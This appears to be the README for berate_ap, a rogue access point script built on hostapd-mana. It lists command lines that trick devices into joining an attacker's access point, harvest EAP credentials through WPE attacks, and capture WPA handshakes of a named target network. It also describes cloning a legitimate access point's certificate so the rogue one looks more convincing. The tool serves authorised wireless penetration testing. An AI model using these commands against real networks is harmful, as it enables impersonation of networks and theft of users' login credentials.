Create_ap has been modified to run EAP networks and hostapd-mana with multiple options
This script requires hostapd-mana to be in the path.
This may be done by adding the binary to your path directly:
export PATH="$PATH:/path/to/hostapd-mana"
To make this permanent you may add to your shells .rc file
or you may link hostapd-mana into a directory that is within your path
cd /usr/bin
sudo ln -s /path/to/hostapd-mana hostapd-mana
Run Mana to trick users into connecting to your access point. The eap users file is not passed so that the default mana eap user file is used:
berate_ap --eap --mana wlan0 eth0 MyAccessPoint
Mana WPE attacks are no longer done by default when using --mana
and have to be enabled seperatly:
berate_ap --eap --mana-wpe wlan0 eth0 MyAccessPoint
Other Mana WPE options avaliable are --mana-eapsuccess
and --mana-eaptls
, the location of the credout file is by default /tmp/hostapd.credout
but may be specified with --mana-credout <file>
(Preferable to use full path). More information on these may be found in the Hostapd-mana wiki.
Run Mana with WPA capture enabled. This currently requires that mana attacks be disabled. hccapx will be placed at /tmp/hostapd.hccapx
, this may be specified with --mana-wpaout <file>
:
berate_ap --mana-wpa -n wlan0 <target Network Name> "ANYPASSWORD"
Run Mana in loud mode to show devices every access point seen by Mana:
berate_ap --eap --mana --mana-loud wlan0 eth0 MyAccessPoint
Run Mana and bridge the network connection to your ethernet address:
berate_ap --eap --mana -m bridge wlan0 eth0 MyAccessPoint
Run Mana and be stingy by not providing any upstream Internet access:
berate_ap --eap --mana -n wlan0 MyAccessPoint
When running your Rogue AP users may be presented with your certificate when authenticating, it is in your interest to make your certificate look as similar to the legitimate APs as possible. When running a EAP access point berate_ap
will ask you to fill in fields to generate the certificate to be used, try input sensible values.
To get the values of the certificate in use by the legitimate AP use this script to extract the certificate from a packet capture:
./extract_EAP.sh -r <capture file>
or interface in monitor mode:
airmon-ng start <interface> <channel>
./extract_EAP.sh -i <interface>
you may then view the certificate with:
openssl x509 -text -inform der -in <capturedcert>.der
Which will allow you to see the values set in the cert so that with berate you may generate a more appealing looking AP.
- Create an AP (Access Point) at any channel.
- Choose one of the following encryptions: WPA, WPA2, WPA/WPA2, Open (no encryption).
- Support for Enterprise setups
- Hide your SSID.
- Disable communication between clients (client isolation).
- IEEE 802.11n & 802.11ac support
- Internet sharing methods: NATed or Bridged or None (no Internet sharing).
- Choose the AP Gateway IP (only for 'NATed' and 'None' Internet sharing methods).
- You can create an AP with the same interface you are getting your Internet connection.
- You can pass your SSID and password through pipe or through arguments (see examples).
- bash (to run this script)
- util-linux (for getopt)
- procps or procps-ng
- hostapd
- iproute2
- iw
- iwconfig (you only need this if 'iw' can not recognize your adapter)
- haveged (optional)
- dnsmasq
- iptables
git clone https://github.com/sensepost/berate_ap
berate_ap wlan0 eth0 MyAccessPoint
berate_ap wlan0 eth0 MyAccessPoint MyPassPhrase
berate_ap -n wlan0 MyAccessPoint MyPassPhrase
berate_ap -m bridge wlan0 eth0 MyAccessPoint MyPassPhrase
berate_ap -m bridge wlan0 br0 MyAccessPoint MyPassPhrase
berate_ap wlan0 wlan0 MyAccessPoint MyPassPhrase
berate_ap --driver rtl871xdrv wlan0 eth0 MyAccessPoint MyPassPhrase
echo -e "MyAccessPoint" | berate_ap wlan0 eth0
echo -e "MyAccessPoint\nMyPassPhrase" | berate_ap wlan0 eth0
berate_ap --ieee80211n --ht_capab '[HT40+]' wlan0 eth0 MyAccessPoint MyPassPhrase
berate_ap --isolate-clients wlan0 eth0 MyAccessPoint MyPassPhrase
berate_ap --eap --eap-user-file /tmp/users.eap_hosts --eap-cert-path /tmp/certificates wlan0 eth0 MyAccessPoint
berate_ap --eap --radius-server 192.168.1.1:1812 --radius-secret=P@ssw0rd wlan0 eth0 MyAccessPoint
Using the persistent systemd service
systemctl start create_ap
systemctl enable create_ap
FreeBSD